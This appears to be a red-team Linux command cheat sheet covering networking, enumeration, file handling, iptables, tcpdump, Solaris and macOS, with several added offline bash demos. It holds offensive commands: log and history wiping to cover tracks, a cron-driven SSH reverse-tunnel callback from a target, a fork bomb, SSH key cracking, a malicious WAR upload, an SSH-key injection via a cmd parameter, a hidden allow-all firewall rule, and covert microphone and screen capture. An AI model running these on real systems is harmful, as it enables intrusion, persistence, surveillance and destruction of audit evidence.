Network commands

watch ss -tp
Network connections, refreshed live
netstat -ant
TCP connections (-anu for UDP)
netstat -tulpn
Listening sockets with owning PIDs
lsof -i
Established connections
smb://ip/share
Open an SMB share from a file browser
mount -t cifs //x.x.x.x/c$ /mnt/share -o username=user
Mount a Windows share
smbclient -U user //ip/share
Connect to an SMB share
ifconfig eth# ip/cidr
Set IP and netmask
ifconfig eth0:1 ip/cidr
Add a virtual interface
route add default gw gwip
Set the default gateway
ifconfig eth# mtu [size]
Change the MTU size
export MAC=xx:xx:xx:xx:xx:xx
Store a MAC address in a variable
ifconfig int hw ether $MAC
Change the MAC address
macchanger -m MAC int
Change the MAC address (Kali/BackTrack)
iwlist int scan
Scan for Wi-Fi networks
nc -lvvp port
Listen on a port
python3 -m http.server port
Start a web server in the current directory
dig -x ip
Reverse-resolve an IP to its names
host ip
Reverse-resolve an IP to its names
host -t SRV _service._tcp.domain
Look up a domain's SRV records
dig @ip domain -t AXFR
Attempt a DNS zone transfer
host -l domain namesvr
Attempt a DNS zone transfer
ip xfrm state list
Show IPsec security associations (VPN state)
ip addr add ip/cidr dev eth0
Add a second ("hidden") address to an interface
cat /var/log/messages | grep DHCP
List DHCP lease events
tcpkill host ip and port port
Kill connections to ip:port
echo "1" > /proc/sys/net/ipv4/ip_forward
Enable IP forwarding
echo "nameserver x.x.x.x" >> /etc/resolv.conf
Add a DNS server
showmount -e ip
Show NFS exports
mkdir /site_backups; mount -t nfs ip:/ /site_backups
Mount the NFS root export from ip

System information

nbtstat -A ip
Get the NetBIOS hostname for ip (Windows; on Linux use nmblookup -A ip)
whoami
Current username
w
Logged-in users
who -a
User information
last -a
Last logged-in users
ps -ef
Running processes (or use top)
df -h
Disk usage (for memory, use free)
uname -a
Kernel version and processor architecture
mount
Mounted file systems
getent passwd
List users
export PATH=$PATH:/new/path
Add a directory to PATH
kill pid
Kill the process with pid
cat /etc/issue
OS information
cat /etc/*release*
OS version information
cat /proc/version
Kernel version information
rpm --query --all
Installed packages (Red Hat)
rpm -ivh *.rpm
Install an rpm package (-e to remove)
dpkg --get-selections
Installed packages (Debian/Ubuntu)
dpkg -i *.deb
Install a deb package (-r to remove)
pkginfo
Installed packages (Solaris)
which tcsh csh ksh bash
Show the path of each shell binary
chmod o-x /bin/tcsh /bin/csh /bin/ksh
Remove execute permission on the other shells, forcing users onto bash
find / -perm -4000 -type f -exec ls -la {} \; 2>/dev/null
Find setuid files
find / -uid 0 -perm -4000 -type f 2>/dev/null
Find root-owned setuid files
find / -writable ! -user $(whoami) -type f ! -path "/proc/*" ! -path "/sys/*" -exec ls -al {} \; 2>/dev/null
Show writable files not owned by the current user
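The setuid and writable-file searches above are the core of local privilege-escalation triage, but their exclusions are easy to get wrong. The script below is an added example, not part of the original cheat sheet: it builds a small constructed directory tree (a fake usr/bin with setuid and setgid scripts, a decoy under a fake proc, and a world-writable file) and runs the same find expressions against it so the -path exclusion and the -o grouping can be checked without touching the real root. The page's writable check relies on `! -user $(whoami)`, which needs a second account to show anything, so this example substitutes a world-writable test (-perm -0002); file names are made up.

```bash
#!/usr/bin/env bash
# Added example (not from the original cheat sheet): the SUID/SGID and
# writable-file find commands run against a constructed scratch tree.
set -eu

root=$(mktemp -d)
trap 'rm -rf "$root"' EXIT

# Constructed tree: one setuid script, one setgid script, a setuid decoy under
# a fake /proc (must be excluded), and a world-writable file.
mkdir -p "$root/usr/bin" "$root/proc/1" "$root/tmp"
printf '#!/bin/sh\n' > "$root/usr/bin/suidtool";  chmod 4755 "$root/usr/bin/suidtool"
printf '#!/bin/sh\n' > "$root/usr/bin/sgidtool";  chmod 2755 "$root/usr/bin/sgidtool"
printf 'x\n' > "$root/proc/1/suiddecoy";          chmod 4755 "$root/proc/1/suiddecoy"
printf 'x\n' > "$root/tmp/notes.txt";             chmod 0666 "$root/tmp/notes.txt"

# Regular files with the setuid bit, skipping the pseudo-filesystem
# (the cheat-sheet find with / replaced by the scratch root).
find_suid() {
  find "$1" -type f -perm -4000 ! -path "$1/proc/*" 2>/dev/null | sort
}

# setuid OR setgid. The parentheses matter: without them "-type f" binds to
# only one side of -o and directories with the setgid bit leak into the list.
find_suid_or_sgid() {
  find "$1" -type f \( -perm -4000 -o -perm -2000 \) ! -path "$1/proc/*" 2>/dev/null | sort
}

# World-writable regular files outside /proc and /sys (stand-in for the
# "! -user $(whoami)" check on the page, which needs a second account).
find_world_writable() {
  find "$1" -type f -perm -0002 ! -path "$1/proc/*" ! -path "$1/sys/*" 2>/dev/null | sort
}

count_lines() { "$@" | wc -l | tr -d ' '; }

find_suid "$root"
find_suid_or_sgid "$root"
find_world_writable "$root"
```

On a real host replace `"$root"` with `/`; the decoy shows why the `! -path "/proc/*"` exclusion belongs in the command and not as an afterthought.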

Utility commands

python -c "import pty;pty.spawn('/bin/bash')"
Upgrade to an interactive shell
wget http://url -O url.txt -o /dev/null
Fetch a URL to url.txt, discarding the log
rdesktop ip
RDP to ip
scp /tmp/file user@ip:/tmp/file
Send a file
scp user@remoteip:/tmp/file /tmp/file
Retrieve a file
useradd -m user
Add a user with a home directory
passwd user
Change a user's password
userdel -r user
Delete a user and their home directory
script -a outfile
Record the terminal session to outfile; Ctrl-D to stop
apropos subject
Find related commands
history
Show the user's command history
!num
Re-run line num from history
ssh2john id_rsa > ssh-key
Convert an encrypted private key into a crackable hash
john ssh-key
Crack the key passphrase
ssh -i id_rsa user@ip
Connect with the key (and passphrase)
id -u
Get the user ID
cut -d: -f3 < <(getent group GROUPNAME)
Get the group ID
curl -G 'url' --data-urlencode 'cmd=echo ssh-rsa AA...'
Send URL-encoded parameters with a GET request
curl --user 'tomcat:$3cureP4s5w0rd123!' --upload-file exploit.war 'url'
Deploy a WAR through the Tomcat manager with an HTTP PUT (single quotes keep the $ in the password from expanding)

File commands

wc -l file
Count lines in a file
diff file file2
Compare two files
rm -rf dir
Force-delete a directory tree
shred -f -u file
Overwrite a file, then delete it
touch -r ref_file file
Copy ref_file's timestamps onto file
touch -t YYYYMMDDhhmm file
Set a file's timestamp
sudo fdisk -l
List connected drives
mount /dev/sda# /mnt/usbkey
Mount a USB device
md5sum -t file
MD5 hash of a file
echo -n "str" | md5sum
MD5 hash of a string
sha1sum file
SHA-1 hash of a file
sort -u
Sort and print unique lines
grep -c "str" file
Count lines containing str
grep -Hnri word * | vim -
Search files for a word, with file name and line number, browsed in vim
grep -rial word
List files containing the word (case-insensitive, binaries included)
tar cf file.tar files
Create a .tar from files
tar xf file.tar
Extract a .tar
tar czf file.tar.gz files
Create a .tar.gz
tar xzf file.tar.gz
Extract a .tar.gz
tar cjf file.tar.bz2 files
Create a .tar.bz2
tar xjf file.tar.bz2
Extract a .tar.bz2
gzip file
Compress file to file.gz
gzip -d file.gz
Decompress file.gz
upx -9 -o out.exe orig.exe
Pack orig.exe with UPX into out.exe
zip -r archive.zip directory
Create a zip archive
dd if=file of=out bs=1 skip=1000 count=2000
Copy bytes 1000-2999 (a 2 KB slice) of file into out
split -b 9K file prefix
Split a file into 9 KB pieces
awk 'sub("$","\r")' unix.txt > win.txt
Convert a text file to Windows line endings
find / -iname '*.pdf' -type f
Search for PDF files
find / -type f \( -perm -4000 -o -perm -2000 \) -exec ls -ldb {} \;
Find setuid or setgid files
dos2unix file
Convert to Unix line endings
file file
Determine the file type
chattr +i file / chattr -i file
Set or clear the immutable attribute
while [ $? -eq 0 ]; do cd flag/; done
Descend a deeply nested chain of flag/ directories until cd fails
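Two of the file commands above are easy to misuse: dd's skip and count are in blocks, not bytes, so a slice is only right when bs is chosen accordingly, and touch -r only helps as a timestomping step if it really copies both timestamps. The script below is an added example, not from the original cheat sheet: it generates a constructed 10,000-byte file, cuts bytes 1000-2999 with dd (bs=1) and independently with tail/head, compares the two, then clones a reference timestamp onto the slice and checks it. File names and the scratch directory are made up for the demo.

```bash
#!/usr/bin/env bash
# Added example (not from the original cheat sheet): verify the dd byte-slice
# arithmetic and the touch -r timestamp clone on a constructed scratch file.
set -eu

work=$(mktemp -d)
trap 'rm -rf "$work"' EXIT

# Constructed input: 1000 lines of "%09d\n" = exactly 10000 bytes.
make_sample() {
  awk 'BEGIN { for (i = 0; i < 1000; i++) printf "%09d\n", i }' > "$work/file"
}

# Extract bytes [offset, offset+len) with dd. bs=1 makes skip/count count
# bytes; with the page's bs=8 the same numbers would skip 8000 bytes.
dd_slice() {   # dd_slice offset len out
  dd if="$work/file" of="$3" bs=1 skip="$1" count="$2" 2>/dev/null
}

# Same slice via tail/head (tail -c +N is 1-based), used as the reference.
ref_slice() {  # ref_slice offset len out
  tail -c +$(($1 + 1)) "$work/file" | head -c "$2" > "$3"
}

slice_size() { wc -c < "$1" | tr -d ' '; }
same_bytes() { cmp -s "$1" "$2"; }

# Clone the reference file's access and modify times onto the target.
clone_times() { touch -r "$1" "$2"; }
# Equal mtimes: neither file is newer nor older than the other.
same_mtime() { [ ! "$1" -nt "$2" ] && [ ! "$1" -ot "$2" ]; }

make_sample
dd_slice 1000 2000 "$work/slice.dd"
ref_slice 1000 2000 "$work/slice.ref"
touch -t 201501011200 "$work/ref"        # reference timestamp to clone
clone_times "$work/ref" "$work/slice.dd"
ls -l --time-style=full-iso "$work" 2>/dev/null || ls -l "$work"
```

The -nt/-ot comparison is deliberately used instead of parsing stat output, which differs between GNU and BSD; it also exposes sub-second drift, which touch -r does not introduce but a hand-typed touch -t does.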

Miscellaneous commands

unset HISTFILE
Disable history logging for this session
ssh user@ip arecord - | aplay -
Remote microphone recording, played back locally
gcc -o outfile myfile.c
Compile C (use g++ for C++)
init 6
Reboot (init 0 = shutdown)
cat /etc/*syslog*.conf | grep -v "^#"
List the log files syslog writes to
grep 'href=' file | cut -d"/" -f3 | grep url | sort -u
Extract unique link hosts from a file
dd if=/dev/urandom of=file bs=3145728 count=100
Create a 300 MiB random file (100 blocks of 3 MiB; use count=1 for 3 MiB)
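The href/cut/sort one-liner above works because the third "/"-delimited field of `scheme://host/path` is the host, but it misbehaves on links with no path and silently drops relative links. The script below is an added example, not from the original cheat sheet: it runs the page's pipeline over a constructed HTML snippet (hosts under example.com/.net/.org, not real targets) and beside it a version that pulls the host out of the href attribute itself, so the two can be compared offline.

```bash
#!/usr/bin/env bash
# Added example (not from the original cheat sheet): the href/cut/sort link
# extraction from the page, run over a constructed HTML sample.
set -eu

# Constructed sample page; the hosts are documentation examples, not targets.
sample_html=$(cat <<'EOF'
<a href="http://www.example.com/index.html">home</a>
<a href="https://cdn.example.net/static/app.js">js</a>
<a href='http://www.example.com/about'>about</a>
<a href="/relative/path">rel</a>
<a href="//static.example.org/logo.png">proto-relative</a>
<a href="https://mail.example.com">mail</a>
EOF
)

# Page pipeline: field 3 of a "/"-split line is the host for scheme://host/...
# Relative links have no host in field 3, so the keyword grep drops them, and a
# link with no path keeps the closing quote and tag text ("mail.example.com">mail<").
extract_hosts_page_style() {   # extract_hosts_page_style keyword
  printf '%s\n' "$sample_html" | grep 'href=' | cut -d"/" -f3 | grep "$1" | sort -u
}

# Pull the host from the href attribute itself: strip the attribute prefix,
# an optional scheme plus "//", then everything from the first "/" onward.
# Relative links reduce to an empty string and are filtered out.
extract_hosts() {
  printf '%s\n' "$sample_html" \
    | grep -o 'href=["'"'"'][^"'"'"']*' \
    | sed -E 's#^href=["'"'"']##; s#^(https?:)?//##; s#/.*$##' \
    | grep -v '^$' | sort -u
}

count_hosts() { extract_hosts | wc -l | tr -d ' '; }

extract_hosts_page_style example
echo ---
extract_hosts
```

Run against a saved page, the second function gives a clean host list for scope checks; the first is still handy at the prompt when every link on the page has a path.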

Covering tracks

echo "" > /var/log/auth.log
Empty the auth.log file
echo "" > ~/.bash_history
Empty the current user's bash history file
rm ~/.bash_history -rf
Delete the .bash_history file
history -c
Clear the current session's history
export HISTFILESIZE=0
Set the maximum lines of the history file to zero
export HISTSIZE=0
Set the maximum number of commands kept in memory to zero
unset HISTFILE
Stop writing history (takes effect on logout)
kill -9 $$
Kill the current shell so it never writes its history
ln /dev/null ~/.bash_history -sf
Permanently send all history to /dev/null

File system structure

/bin
System binaries
/boot
Files related to the boot process
/dev
Interfaces to system devices
/etc
System configuration files
/home
Home directories for users
/lib
Essential software libraries
/proc
Running processes and kernel state
/root
Home directory of the root user
/sbin
System administration binaries
/tmp
Temporary files
/usr
Less critical files (user programs and data)
/var
Variable system files (logs, spools)


Important files

/etc/shadow
Local user password hashes
/etc/passwd
Local users
/etc/group
Local groups
/etc/rc.d
Startup services
/etc/hosts
List of hostnames and IPs
/etc/HOSTNAME
Hostname with domain
/etc/network/interfaces
Network configuration
/etc/profile
System environment variables
/etc/apt/sources.list
Ubuntu/Debian package sources
/etc/resolv.conf
Nameserver settings
/home/user/.bash_history
bash history (also in /root/)
/usr/share/wireshark/manuf
MAC address manufacturer list
~/.ssh/
Location of SSH keys
/var/log/messages
System log file (Linux)
/var/adm/messages
System log file (Unix)
/var/spool/cron
Cron job files
/var/log/apache2/access.log
Apache access log
/etc/fstab
Static file system mount information

Using PowerShell on Linux

sudo apt install gss-ntlmssp
sudo apt-get install powershell

Log in with username and password

$offsec_session = New-PSSession -ComputerName ip -Authentication Negotiate -Credential k.svensson
Enter-PSSession $offsec_session
New-Item -ItemType Junction -Path 'C:\ProgramData' -Target 'C:\Users\Administrator'

Scripting

Create a ping sweep

for x in {1..254}; do ping -c 1 1.1.1.$x | grep "64 b" | cut -d" " -f4 | tr -d ':' >> ips.txt; done

Automating reverse name resolution in a bash script

echo "Enter Class C Range: i.e. 192.168.3"
read range
for ip in {1..254}; do
    host $range.$ip | grep "name pointer" | cut -d" " -f5
done

Creating a fork bomb (spawns processes until the system crashes)

:(){ :|:& };:

DNS reverse lookup loop

for ip in {1..254}; do dig -x 1.1.1.$ip | grep $ip >> dns.txt; done
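The sweep loops above all depend on field positions in ping and host output, which is where they usually break (the address in a ping reply carries a trailing colon, the PTR target a trailing dot). The script below is an added example, not from the original cheat sheet: it applies the same grep/cut pipelines to constructed ping and host output for hosts in 192.0.2.0/24 (TEST-NET-1, documentation addresses) so the parsing can be checked without a network. The sample lines and hostnames are made up.

```bash
#!/usr/bin/env bash
# Added example (not from the original cheat sheet): the grep/cut parsing from
# the ping-sweep and reverse-DNS loops, run over constructed tool output.
set -eu

# Constructed output of "ping -c 1" against four hosts; .11 is unreachable
# and .13 never answers.
ping_output=$(cat <<'EOF'
PING 192.0.2.10 (192.0.2.10) 56(84) bytes of data.
64 bytes from 192.0.2.10: icmp_seq=1 ttl=64 time=0.412 ms
PING 192.0.2.11 (192.0.2.11) 56(84) bytes of data.
From 192.0.2.1 icmp_seq=1 Destination Host Unreachable
PING 192.0.2.12 (192.0.2.12) 56(84) bytes of data.
64 bytes from 192.0.2.12: icmp_seq=1 ttl=128 time=1.203 ms
PING 192.0.2.13 (192.0.2.13) 56(84) bytes of data.
EOF
)

# Constructed output of "host" for the same hosts.
host_output=$(cat <<'EOF'
10.2.0.192.in-addr.arpa domain name pointer gw.example.test.
Host 11.2.0.192.in-addr.arpa not found: 3(NXDOMAIN)
12.2.0.192.in-addr.arpa domain name pointer files.example.test.
EOF
)

# Page pipeline: the 4th space-separated field of a reply line is the address,
# but it carries a trailing colon ("192.0.2.10:"); tr strips it.
alive_hosts() {
  printf '%s\n' "$ping_output" | grep "64 b" | cut -d" " -f4 | tr -d ':'
}

# Reverse-lookup pipeline: the PTR target is the 5th field, with a trailing dot.
ptr_names() {
  printf '%s\n' "$host_output" | grep " name pointer " | cut -d" " -f5 | sed 's/\.$//'
}

alive_count() { alive_hosts | wc -l | tr -d ' '; }

alive_hosts
ptr_names
```

Drop the `tr -d ':'` and the ips.txt produced by the sweep cannot be fed straight into nmap -iL, which is the usual next step.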

IP ban script (bogus static ARP entries)

# This script bans any IP in the /24 subnet starting at .2
# It assumes .1 is the router and does not ban IPs .20, .21, .22
i=2
while [ $i -le 253 ]; do
    if [ $i -ne 20 -a $i -ne 21 -a $i -ne 22 ]; then
        echo "BANNED: arp -s 192.168.1.$i"
        arp -s 192.168.1.$i 00:00:00:00:00:0a
    else
        echo "IP NOT BANNED: 192.168.1.$i"
    fi
    i=$(expr $i + 1)
done

Create an SSH callback

Set up the script in crontab to call back every X minutes. It is highly recommended that you
set up a generic user on the red team computer (with no shell privileges). The script
will use the private key (located on the callback source computer) to connect
to the matching public key (on the red team computer). The red teamer then connects to the target via a
local SSH session (in the example below, ssh -p4040 localhost).

#!/bin/bash
# Callback: script located on callback source computer (target)
# Placeholder values; set REMLIS, REMUSR and LIVEHOST for your environment
REMLIS=4040            # port opened on the red team host (ssh -p4040 localhost)
REMUSR=callbackuser    # generic no-shell user on the red team host
LIVEHOST=redteam.ip    # red team host address
killall ssh > /dev/null 2>&1
sleep 5
COUNT=$(ping -c2 $LIVEHOST | grep 'received' | awk -F',' '{ print $2 }' | awk '{ print $1 }')
if [[ $COUNT -gt 0 ]]; then
    ssh -R ${REMLIS}:localhost:22 -i "/home/${REMUSR}/.ssh/id_rsa" -N ${LIVEHOST} -l ${REMUSR}
fi

Iptables commands

ip6tables
iptables for IPv6
iptables-save -c file
Dump iptables rules (with counters) to file
iptables-restore file
Restore iptables rules from file
iptables -L -v --line-numbers
List all rules with their line numbers
iptables -F
Flush all rules
iptables -P chain ACCEPT|DROP
Set the policy applied when no rule matches
iptables -A INPUT -i interface -m state --state RELATED,ESTABLISHED -j ACCEPT
Allow inbound packets belonging to established connections
iptables -D INPUT 7
Delete rule 7 from the INPUT chain
iptables -t raw -L -n
List the raw table (NOTRACK rules placed here bypass connection tracking for throughput)
iptables -P INPUT DROP
Drop all inbound packets by default

Allow outbound SSH (port 22)

iptables -A OUTPUT -o iface -p tcp --dport 22 -m state --state NEW,ESTABLISHED -j ACCEPT
iptables -A INPUT -i iface -p tcp --sport 22 -m state --state ESTABLISHED -j ACCEPT

Allow outbound ICMP

iptables -A OUTPUT -o iface -p icmp --icmp-type echo-request -j ACCEPT
iptables -A INPUT -i iface -p icmp --icmp-type echo-reply -j ACCEPT

Create a port forward

echo "1" > /proc/sys/net/ipv4/ip_forward
# OR: sysctl net.ipv4.ip_forward=1
iptables -t nat -A PREROUTING -p tcp -i eth0 -d pivotip --dport 443 -j DNAT --to-destination attackip:443
iptables -t nat -A POSTROUTING -p tcp -o eth0 -s targetsubnet/cidr -d attackip --dport 443 -j SNAT --to-source pivotip
iptables -t filter -I FORWARD 1 -j ACCEPT

Allow ports 80 and 443 and log dropped packets to /var/log/messages

iptables -A INPUT -s srcnet/cidr -m state --state RELATED,ESTABLISHED,NEW -p tcp -m multiport --dports 80,443 -j ACCEPT
iptables -A INPUT -i eth0 -m state --state RELATED,ESTABLISHED -j ACCEPT
iptables -P INPUT DROP
iptables -A OUTPUT -o eth0 -j ACCEPT
iptables -A INPUT -i lo -j ACCEPT
iptables -A OUTPUT -o lo -j ACCEPT
iptables -N LOGGING
iptables -A INPUT -j LOGGING
iptables -A LOGGING -m limit --limit 4/min -j LOG --log-prefix "DROPPED "
iptables -A LOGGING -j DROP

update-rc.d (Debian/Ubuntu)

service --status-all
List services: [+] starts at boot, [-] does not
service service start
Start a service
service service stop
Stop a service
service service status
Check a service's status
update-rc.d -f service remove
Remove a service from system startup (-f forces removal even if /etc/init.d/service still exists)
update-rc.d service defaults
Add a service to system startup

chkconfig (Red Hat family, e.g. CentOS and Oracle Linux)

chkconfig --list
List all services and their runlevel status
chkconfig --list service
Status of one service
chkconfig service on [--level 3]
Enable a service (optionally for a specific runlevel)
chkconfig service off [--level 3]
Disable a service, e.g. chkconfig iptables off

Screen commands

screen -S name
Create a new screen session called name
screen -ls
List running screen sessions
screen -r name
Reattach to the session called name
screen -S name -X cmd
Send a command to the session called name
C-a ?
List key bindings (help)
C-a d
Detach
C-a D D
Detach and log out
C-a c
Create a new window
C-a C-a
Switch to the last window
C-a ' num|name
Switch to the window with that number or name
C-a "
List windows and select one
C-a k
Kill the current window
C-a S
Split the display horizontally
C-a V
Split the display vertically
C-a tab
Jump to the next region
C-a X
Remove the current region
C-a Q
Remove all regions except the current one


Remote capture of an X11 display, converted to JPG

xwd -display ip:0 -root -out /tmp/test.xpm
xwud -in /tmp/test.xpm
convert /tmp/test.xpm -resize 1280x1024 /tmp/test.jpg

Silent X11 screen dump

xwd -display ip:0 -root -silent -out x11dump
Read the dumped file with xwudtopnm or GIMP

TCPDump commands

Capture packets on eth0 and save them to a file (-XX only affects printed output; -w stores the raw packets)

tcpdump -i eth0 -XX -w out.pcap

Capture traffic to ip on port 80

tcpdump -i eth0 port 80 dst ip

Show all connections to ip from outside the local network, with timestamps

tcpdump -i eth0 -tttt dst ip and not net cidr

Show all ping replies

tcpdump -i eth0 'icmp[icmptype] == icmp-echoreply'

Capture 50 DNS packets and display timestamps

tcpdump -i eth0 -c 50 -tttt 'udp and port 53'

Kali default commands

WMIC equivalent

wmis -U DOMAIN\user%password //DC cmd.exe /c command

Mount an SMB share

# Mounts to /mnt/share. For other options besides ntlmssp, man mount.cifs
mount.cifs //ip/share /mnt/share -o user=user,pass=password,sec=ntlmssp

Update Kali

apt-get update
apt-get upgrade

Check the OS for privilege escalation paths (LinEnum)
Example: ./LinEnum.sh -s -k keyword -r report -e /tmp/ -t

List all processes, including root's, without root access (pspy)
Example: ./pspy64 -pf -i 1000

pfSense commands

pfSsh.php
pfSense shell
pfSsh.php playback enableallowallwan
Allow all inbound connections on the WAN (adds a hidden allow-all WAN rule)
pfSsh.php playback enablesshd
Enable the SSH daemon
pfctl -sn
Show NAT rules
pfctl -sr
Show filter rules
pfctl -sa
Show all rules
viconfig
Edit the configuration
rm /tmp/config.cache
Remove the cached (old) configuration after editing
/etc/rc.reload_all
Reload the entire configuration

Solaris

ifconfig -a
List all interfaces
netstat -in
List all interfaces
netstat -rn
List routes
ifconfig int dhcp
Start DHCP on an interface
ifconfig int plumb up ip netmask nmask
Set an IP address
route add default ip
Set the default gateway
logins -p
List users with no password
svcs -a
List all services with status
prstat -a
Process status (or use top)
svcadm enable ssh
Start the SSH service
inetadm -e telnet
Enable telnet (-d to disable)
prtconf | grep Memory
Total physical memory
iostat -En
Hard disk size
showrev -c /usr/bin/bash
Binary information
shutdown -i6 -g0 -y
Restart the system
dfmounts
List clients with NFS mounts
smc
GUI management console
snoop -d int -c pkt# -o results.pcap
Packet capture
/etc/vfstab
File system mount table
/var/adm/loginlog
Log of repeated failed login attempts
/etc/default/*
Default settings
/etc/system
Kernel modules and settings
/etc/syslog.conf
syslog configuration
/etc/auto_*
Automounter configuration files
/etc/inet/ipnodes
IPv4 and IPv6 hosts file

Important cache files

vim editor file


Situational Awareness (macOS)

top
Real-time system statistics: CPU usage, memory usage and running processes
ps aux
Running processes with their details
netstat -an
Active network connections, routing tables and interface/protocol statistics
lsof -i
Active network connections and the processes using them
tcpdump
Capture and analyse network traffic
tail -f /var/log/system.log
Follow the macOS system log in real time
log show --predicate 'process == "PROCESS_NAME"' --info
Show unified log entries for a specific process
fs_usage
Real-time file system activity: which files are accessed and by which processes
displays a graphical representation of file system activity.